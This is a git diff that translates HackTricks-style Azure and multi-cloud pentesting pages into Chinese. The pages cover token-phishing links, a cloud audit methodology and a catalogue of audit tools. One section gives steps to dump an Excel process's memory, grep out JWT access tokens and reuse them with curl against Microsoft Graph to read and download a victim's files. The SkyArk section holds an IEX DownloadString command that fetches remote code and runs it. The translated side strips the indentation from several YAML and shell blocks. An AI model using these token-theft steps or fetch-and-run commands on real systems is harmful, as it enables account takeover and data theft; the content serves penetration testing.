@@ -# Az - Phishing Primary Refresh Token (Microsoft Entra) +# Az - 钓鱼主要刷新令牌 (Microsoft Entra) {{#include ../../../banners/hacktricks-training.md}} -**Check:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/) +**检查:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md index a79c7a659..7ea7a97e3 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md @@ -2,10 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -**Chec the post in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) although another post explaining the same can be found in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30) +**查看帖子在** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) 虽然另一个解释相同内容的帖子可以在 [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30) 找到 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md index 1ba819b3a..147ce9315 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md @@ -2,16 +2,15 @@ {{#include ../../../banners/hacktricks-training.md}} -## **Basic Information** +## **基本信息** -As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA. +正如在[**这个视频**](https://www.youtube.com/watch?v=OHKZkXC4Duw)中解释的,一些与云同步的Microsoft软件(Excel、Teams...)可能会**以明文形式在内存中存储访问令牌**。因此,仅仅**转储**该进程的**内存**并**grep JWT令牌**可能会让你绕过MFA,获得对受害者在云中多个资源的访问权限。 -Steps: - -1. Dump the excel processes synchronized with in EntraID user with your favourite tool. -2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output -3. Find the tokens that interest you the most and run tools over them: +步骤: +1. 使用你喜欢的工具转储与EntraID用户同步的Excel进程。 +2. 运行:`string excel.dmp | grep 'eyJ0'`,并在输出中找到多个令牌 +3. 找到你最感兴趣的令牌,并对其运行工具: ```bash # Check the identity of the token curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/me | jq @@ -31,11 +30,6 @@ curl -s -H "Authorization: Bearer " 'https://graph.microsoft.com/v1.0/sit ┌──(magichk㉿black-pearl)-[~] └─$ curl -o -L -H "Authorization: Bearer " '<@microsoft.graph.downloadUrl>' ``` - -**Note that these kind of access tokens can be also found inside other processes.** +**请注意,这种访问令牌也可以在其他进程中找到。** {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md b/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md index 39ee71d6c..9c9fbd303 100644 --- a/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md +++ b/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md @@ -2,10 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**. +要开始测试,您应该拥有一个具有**订阅的读取权限**和**AzureAD中的全局读取角色**的用户访问权限。如果在这种情况下您仍然**无法访问存储帐户的内容**,您可以通过**角色存储帐户贡献者**来修复它。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md index 0be67db54..6056b0a22 100644 --- a/src/pentesting-cloud/pentesting-cloud-methodology.md +++ b/src/pentesting-cloud/pentesting-cloud-methodology.md @@ -4,45 +4,44 @@
-## Basic Methodology +## 基本方法论 -Each cloud has its own peculiarities but in general there are a few **common things a pentester should check** when testing a cloud environment: +每个云都有其独特性,但一般来说,有一些**渗透测试人员应该检查的共同事项**在测试云环境时: -- **Benchmark checks** - - This will help you **understand the size** of the environment and **services used** - - It will allow you also to find some **quick misconfigurations** as you can perform most of this tests with **automated tools** -- **Services Enumeration** - - You probably won't find much more misconfigurations here if you performed correctly the benchmark tests, but you might find some that weren't being looked for in the benchmark test. - - This will allow you to know **what is exactly being used** in the cloud env - - This will help a lot in the next steps -- **Check exposed assets** - - This can be done during the previous section, you need to **find out everything that is potentially exposed** to the Internet somehow and how can it be accessed. - - Here I'm taking **manually exposed infrastructure** like instances with web pages or other ports being exposed, and also about other **cloud managed services that can be configured** to be exposed (such as DBs or buckets) - - Then you should check **if that resource can be exposed or not** (confidential information? vulnerabilities? misconfigurations in the exposed service?) -- **Check permissions** - - Here you should **find out all the permissions of each role/user** inside the cloud and how are they used - - Too **many highly privileged** (control everything) accounts? Generated keys not used?... Most of these check should have been done in the benchmark tests already - - If the client is using OpenID or SAML or other **federation** you might need to ask them for further **information** about **how is being each role assigned** (it's not the same that the admin role is assigned to 1 user or to 100) - - It's **not enough to find** which users has **admin** permissions "\*:\*". There are a lot of **other permissions** that depending on the services used can be very **sensitive**. - - Moreover, there are **potential privesc** ways to follow abusing permissions. All this things should be taken into account and **as much privesc paths as possible** should be reported. -- **Check Integrations** - - It's highly probably that **integrations with other clouds or SaaS** are being used inside the cloud env. - - For **integrations of the cloud you are auditing** with other platform you should notify **who has access to (ab)use that integration** and you should ask **how sensitive** is the action being performed.\ - For example, who can write in an AWS bucket where GCP is getting data from (ask how sensitive is the action in GCP treating that data). - - For **integrations inside the cloud you are auditing** from external platforms, you should ask **who has access externally to (ab)use that integration** and check how is that data being used.\ - For example, if a service is using a Docker image hosted in GCR, you should ask who has access to modify that and which sensitive info and access will get that image when executed inside an AWS cloud. +- **基准检查** +- 这将帮助你**了解环境的规模**和**使用的服务** +- 这也将使你能够找到一些**快速的错误配置**,因为你可以使用**自动化工具**执行大部分测试 +- **服务枚举** +- 如果你正确执行了基准测试,你可能不会在这里发现更多的错误配置,但你可能会发现一些在基准测试中未被关注的配置。 +- 这将使你知道**在云环境中到底使用了什么** +- 这在接下来的步骤中会有很大帮助 +- **检查暴露的资产** +- 这可以在前面的部分中完成,你需要**找出所有可能暴露**于互联网的内容以及如何访问它。 +- 这里我指的是**手动暴露的基础设施**,如具有网页的实例或其他暴露的端口,以及其他**可以配置为暴露的云管理服务**(如数据库或存储桶) +- 然后你应该检查**该资源是否可以被暴露**(机密信息?漏洞?暴露服务中的错误配置?) +- **检查权限** +- 在这里你应该**找出每个角色/用户的所有权限**以及它们是如何使用的 +- 过多的**高权限**(控制一切)账户?生成的密钥未使用?... 大部分这些检查应该已经在基准测试中完成 +- 如果客户使用OpenID或SAML或其他**联合**,你可能需要向他们询问更多关于**每个角色是如何分配的**的信息(管理员角色分配给1个用户或100个用户是不同的) +- **仅仅找到**哪些用户具有**管理员**权限“\*:\*”是不够的。还有很多**其他权限**,根据使用的服务可能非常**敏感**。 +- 此外,还有**潜在的权限提升**方式可以通过滥用权限来实现。所有这些都应该考虑在内,并且**尽可能多的权限提升路径**应该被报告。 +- **检查集成** +- 很可能在云环境中**与其他云或SaaS的集成**正在被使用。 +- 对于**你正在审计的云的集成**与其他平台,你应该通知**谁有权访问(滥用)该集成**,并且你应该询问**执行该操作的敏感性**。\ +例如,谁可以在AWS存储桶中写入数据,而GCP正在从中获取数据(询问在GCP处理该数据时该操作的敏感性)。 +- 对于**你正在审计的云内部**来自外部平台的集成,你应该询问**谁有外部访问权限(滥用)该集成**,并检查该数据是如何使用的。\ +例如,如果一个服务使用托管在GCR中的Docker镜像,你应该询问谁有权修改该镜像,以及在AWS云中执行该镜像时将获得哪些敏感信息和访问权限。 -## Multi-Cloud tools +## 多云工具 -There are several tools that can be used to test different cloud environments. The installation steps and links are going to be indicated in this section. +有几种工具可以用于测试不同的云环境。安装步骤和链接将在本节中指明。 ### [PurplePanda](https://github.com/carlospolop/purplepanda) -A tool to **identify bad configurations and privesc path in clouds and across clouds/SaaS.** +一个工具,用于**识别云及跨云/SaaS中的错误配置和权限提升路径。** {{#tabs }} {{#tab name="Install" }} - ```bash # You need to install and run neo4j also git clone https://github.com/carlospolop/PurplePanda @@ -54,29 +53,25 @@ export PURPLEPANDA_NEO4J_URL="bolt://neo4j@localhost:7687" export PURPLEPANDA_PWD="neo4j_pwd_4_purplepanda" python3 main.py -h # Get help ``` - {{#endtab }} {{#tab name="GCP" }} - ```bash export GOOGLE_DISCOVERY=$(echo 'google: - file_path: "" - file_path: "" - service_account_id: "some-sa-email@sidentifier.iam.gserviceaccount.com"' | base64) +service_account_id: "some-sa-email@sidentifier.iam.gserviceaccount.com"' | base64) python3 main.py -a -p google #Get basic info of the account to check it's correctly configured python3 main.py -e -p google #Enumerate the env ``` - {{#endtab }} {{#endtabs }} ### [Prowler](https://github.com/prowler-cloud/prowler) -It supports **AWS, GCP & Azure**. Check how to configure each provider in [https://docs.prowler.cloud/en/latest/#aws](https://docs.prowler.cloud/en/latest/#aws) - +它支持 **AWS, GCP & Azure**。请查看如何在 [https://docs.prowler.cloud/en/latest/#aws](https://docs.prowler.cloud/en/latest/#aws) 中配置每个提供商。 ```bash # Install pip install prowler @@ -91,14 +86,12 @@ prowler aws --profile custom-profile [-M csv json json-asff html] prowler --list-checks prowler --list-services ``` - ### [CloudSploit](https://github.com/aquasecurity/cloudsploit) AWS, Azure, Github, Google, Oracle, Alibaba {{#tabs }} -{{#tab name="Install" }} - +{{#tab name="安装" }} ```bash # Install git clone https://github.com/aquasecurity/cloudsploit.git @@ -107,26 +100,22 @@ npm install ./index.js -h ## Docker instructions in github ``` - {{#endtab }} {{#tab name="GCP" }} - ```bash ## You need to have creds for a service account and set them in config.js file ./index.js --cloud google --config ``` - {{#endtab }} {{#endtabs }} ### [ScoutSuite](https://github.com/nccgroup/ScoutSuite) -AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure +AWS, Azure, GCP, 阿里云, Oracle Cloud Infrastructure {{#tabs }} -{{#tab name="Install" }} - +{{#tab name="安装" }} ```bash mkdir scout; cd scout virtualenv -p python3 venv @@ -135,24 +124,21 @@ pip install scoutsuite scout --help ## Using Docker: https://github.com/nccgroup/ScoutSuite/wiki/Docker-Image ``` - {{#endtab }} {{#tab name="GCP" }} - ```bash scout gcp --report-dir /tmp/gcp --user-account --all-projects ## use "--service-account KEY_FILE" instead of "--user-account" to use a service account SCOUT_FOLDER_REPORT="/tmp" for pid in $(gcloud projects list --format="value(projectId)"); do - echo "================================================" - echo "Checking $pid" - mkdir "$SCOUT_FOLDER_REPORT/$pid" - scout gcp --report-dir "$SCOUT_FOLDER_REPORT/$pid" --no-browser --user-account --project-id "$pid" +echo "================================================" +echo "Checking $pid" +mkdir "$SCOUT_FOLDER_REPORT/$pid" +scout gcp --report-dir "$SCOUT_FOLDER_REPORT/$pid" --no-browser --user-account --project-id "$pid" done ``` - {{#endtab }} {{#endtabs }} @@ -160,17 +146,14 @@ done {{#tabs }} {{#tab name="Install" }} -Download and install Steampipe ([https://steampipe.io/downloads](https://steampipe.io/downloads)). Or use Brew: - +下载并安装 Steampipe ([https://steampipe.io/downloads](https://steampipe.io/downloads))。或者使用 Brew: ``` brew tap turbot/tap brew install steampipe ``` - {{#endtab }} {{#tab name="GCP" }} - ```bash # Install gcp plugin steampipe plugin install gcp @@ -183,13 +166,11 @@ steampipe dashboard # To run all the checks from rhe cli steampipe check all ``` -
-Check all Projects - -In order to check all the projects you need to generate the `gcp.spc` file indicating all the projects to test. You can just follow the indications from the following script +检查所有项目 +为了检查所有项目,您需要生成 `gcp.spc` 文件,指示所有要测试的项目。您可以按照以下脚本中的指示进行操作。 ```bash FILEPATH="/tmp/gcp.spc" rm -rf "$FILEPATH" 2>/dev/null @@ -197,32 +178,30 @@ rm -rf "$FILEPATH" 2>/dev/null # Generate a json like object for each project for pid in $(gcloud projects list --format="value(projectId)"); do echo "connection \"gcp_$(echo -n $pid | tr "-" "_" )\" { - plugin = \"gcp\" - project = \"$pid\" +plugin = \"gcp\" +project = \"$pid\" }" >> "$FILEPATH" done # Generate the aggragator to call echo 'connection "gcp_all" { - plugin = "gcp" - type = "aggregator" - connections = ["gcp_*"] +plugin = "gcp" +type = "aggregator" +connections = ["gcp_*"] }' >> "$FILEPATH" echo "Copy $FILEPATH in ~/.steampipe/config/gcp.spc if it was correctly generated" ``` -
-To check **other GCP insights** (useful for enumerating services) use: [https://github.com/turbot/steampipe-mod-gcp-insights](https://github.com/turbot/steampipe-mod-gcp-insights) +要检查 **其他 GCP 见解**(用于枚举服务),请使用:[https://github.com/turbot/steampipe-mod-gcp-insights](https://github.com/turbot/steampipe-mod-gcp-insights) -To check Terraform GCP code: [https://github.com/turbot/steampipe-mod-terraform-gcp-compliance](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance) +要检查 Terraform GCP 代码,请访问:[https://github.com/turbot/steampipe-mod-terraform-gcp-compliance](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance) -More GCP plugins of Steampipe: [https://github.com/turbot?q=gcp](https://github.com/turbot?q=gcp) +更多 Steampipe 的 GCP 插件:[https://github.com/turbot?q=gcp](https://github.com/turbot?q=gcp) {{#endtab }} {{#tab name="AWS" }} - ```bash # Install aws plugin steampipe plugin install aws @@ -246,29 +225,27 @@ cd steampipe-mod-aws-compliance steampipe dashboard # To see results in browser steampipe check all --export=/tmp/output4.json ``` +要检查 Terraform AWS 代码: [https://github.com/turbot/steampipe-mod-terraform-aws-compliance](https://github.com/turbot/steampipe-mod-terraform-aws-compliance) -To check Terraform AWS code: [https://github.com/turbot/steampipe-mod-terraform-aws-compliance](https://github.com/turbot/steampipe-mod-terraform-aws-compliance) - -More AWS plugins of Steampipe: [https://github.com/orgs/turbot/repositories?q=aws](https://github.com/orgs/turbot/repositories?q=aws) +更多 AWS 的 Steampipe 插件: [https://github.com/orgs/turbot/repositories?q=aws](https://github.com/orgs/turbot/repositories?q=aws) {{#endtab }} {{#endtabs }} ### [~~cs-suite~~](https://github.com/SecurityFTW/cs-suite) -AWS, GCP, Azure, DigitalOcean.\ -It requires python2.7 and looks unmaintained. +AWS, GCP, Azure, DigitalOcean。\ +它需要 python2.7,并且看起来没有维护。 ### Nessus -Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Office 365, Rackspace, Salesforce. Some extra configurations in **Azure** are needed to obtain a **Client Id**. +Nessus 有一个 _**审计云基础设施**_ 扫描,支持:AWS, Azure, Office 365, Rackspace, Salesforce。在 **Azure** 中需要一些额外的配置以获取 **Client Id**。 ### [**cloudlist**](https://github.com/projectdiscovery/cloudlist) -Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers. +Cloudlist 是一个 **多云工具,用于获取资产**(主机名,IP 地址)来自云服务提供商。 {{#tabs }} {{#tab name="Cloudlist" }} - ```bash cd /tmp wget https://github.com/projectdiscovery/cloudlist/releases/latest/download/cloudlist_1.0.1_macOS_arm64.zip @@ -276,46 +253,40 @@ unzip cloudlist_1.0.1_macOS_arm64.zip chmod +x cloudlist sudo mv cloudlist /usr/local/bin ``` - {{#endtab }} -{{#tab name="Second Tab" }} - +{{#tab name="第二个标签" }} ```bash ## For GCP it requires service account JSON credentials cloudlist -config ``` - {{#endtab }} {{#endtabs }} ### [**cartography**](https://github.com/lyft/cartography) -Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database. +Cartography 是一个 Python 工具,它将基础设施资产及其之间的关系整合在一个由 Neo4j 数据库驱动的直观图形视图中。 {{#tabs }} {{#tab name="Install" }} - ```bash # Installation docker image pull ghcr.io/lyft/cartography docker run --platform linux/amd64 ghcr.io/lyft/cartography cartography --help ## Install a Neo4j DB version 3.5.* ``` - {{#endtab }} {{#tab name="GCP" }} - ```bash docker run --platform linux/amd64 \ - --volume "$HOME/.config/gcloud/application_default_credentials.json:/application_default_credentials.json" \ - -e GOOGLE_APPLICATION_CREDENTIALS="/application_default_credentials.json" \ - -e NEO4j_PASSWORD="s3cr3t" \ - ghcr.io/lyft/cartography \ - --neo4j-uri bolt://host.docker.internal:7687 \ - --neo4j-password-env-var NEO4j_PASSWORD \ - --neo4j-user neo4j +--volume "$HOME/.config/gcloud/application_default_credentials.json:/application_default_credentials.json" \ +-e GOOGLE_APPLICATION_CREDENTIALS="/application_default_credentials.json" \ +-e NEO4j_PASSWORD="s3cr3t" \ +ghcr.io/lyft/cartography \ +--neo4j-uri bolt://host.docker.internal:7687 \ +--neo4j-password-env-var NEO4j_PASSWORD \ +--neo4j-user neo4j # It only checks for a few services inside GCP (https://lyft.github.io/cartography/modules/gcp/index.html) @@ -326,17 +297,15 @@ docker run --platform linux/amd64 \ ## Google Kubernetes Engine ### If you can run starbase or purplepanda you will get more info ``` - {{#endtab }} {{#endtabs }} ### [**starbase**](https://github.com/JupiterOne/starbase) -Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database. +Starbase 收集来自服务和系统的资产和关系,包括云基础设施、SaaS 应用程序、安全控制等,形成一个直观的图形视图,支持 Neo4j 数据库。 {{#tabs }} {{#tab name="Install" }} - ```bash # You are going to need Node version 14, so install nvm following https://tecadmin.net/install-nvm-macos-with-homebrew/ npm install --global yarn @@ -359,44 +328,40 @@ docker build --no-cache -t starbase:latest . docker-compose run starbase setup docker-compose run starbase run ``` - {{#endtab }} {{#tab name="GCP" }} - ```yaml ## Config for GCP ### Check out: https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md ### It requires service account credentials integrations: - - name: graph-google-cloud - instanceId: testInstanceId - directory: ./.integrations/graph-google-cloud - gitRemoteUrl: https://github.com/JupiterOne/graph-google-cloud.git - config: - SERVICE_ACCOUNT_KEY_FILE: "{Check https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md#service_account_key_file-string}" - PROJECT_ID: "" - FOLDER_ID: "" - ORGANIZATION_ID: "" - CONFIGURE_ORGANIZATION_PROJECTS: false +- name: graph-google-cloud +instanceId: testInstanceId +directory: ./.integrations/graph-google-cloud +gitRemoteUrl: https://github.com/JupiterOne/graph-google-cloud.git +config: +SERVICE_ACCOUNT_KEY_FILE: "{Check https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md#service_account_key_file-string}" +PROJECT_ID: "" +FOLDER_ID: "" +ORGANIZATION_ID: "" +CONFIGURE_ORGANIZATION_PROJECTS: false storage: - engine: neo4j - config: - username: neo4j - password: s3cr3t - uri: bolt://localhost:7687 - #Consider using host.docker.internal if from docker +engine: neo4j +config: +username: neo4j +password: s3cr3t +uri: bolt://localhost:7687 +#Consider using host.docker.internal if from docker ``` - {{#endtab }} {{#endtabs }} ### [**SkyArk**](https://github.com/cyberark/SkyArk) -Discover the most privileged users in the scanned AWS or Azure environment, including the AWS Shadow Admins. It uses powershell. - +发现扫描的 AWS 或 Azure 环境中最特权的用户,包括 AWS Shadow Admins。它使用 powershell。 ```powershell Import-Module .\SkyArk.ps1 -force Start-AzureStealth @@ -405,18 +370,17 @@ Start-AzureStealth IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1') Scan-AzureAdmins ``` - ### [Cloud Brute](https://github.com/0xsha/CloudBrute) -A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). +一个工具,用于在顶级云服务提供商(亚马逊、谷歌、微软、DigitalOcean、阿里巴巴、Vultr、Linode)上查找公司的(目标)基础设施、文件和应用程序。 ### [CloudFox](https://github.com/BishopFox/cloudfox) -- CloudFox is a tool to find exploitable attack paths in cloud infrastructure (currently only AWS & Azure supported with GCP upcoming). -- It is an enumeration tool which is intended to compliment manual pentesting. -- It doesn't create or modify any data within the cloud environment. +- CloudFox 是一个工具,用于查找云基础设施中的可利用攻击路径(目前仅支持 AWS 和 Azure,GCP 即将推出)。 +- 这是一个枚举工具,旨在补充手动 pentesting。 +- 它不会在云环境中创建或修改任何数据。 -### More lists of cloud security tools +### 更多云安全工具列表 - [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec) @@ -446,16 +410,12 @@ aws-security/ azure-security/ {{#endref}} -### Attack Graph +### 攻击图 -[**Stormspotter** ](https://github.com/Azure/Stormspotter)creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work. +[**Stormspotter** ](https://github.com/Azure/Stormspotter) 创建 Azure 订阅中资源的“攻击图”。它使红队和 pentesters 能够可视化攻击面和租户内的转移机会,并增强您的防御者快速定位和优先处理事件响应工作的能力。 ### Office365 -You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features **via the web application**. +您需要 **Global Admin** 或至少 **Global Admin Reader**(但请注意,Global Admin Reader 有一些限制)。然而,这些限制出现在某些 PS 模块中,可以通过 **通过网络应用程序** 访问功能来绕过。 {{#include ../banners/hacktricks-training.md}} - - - -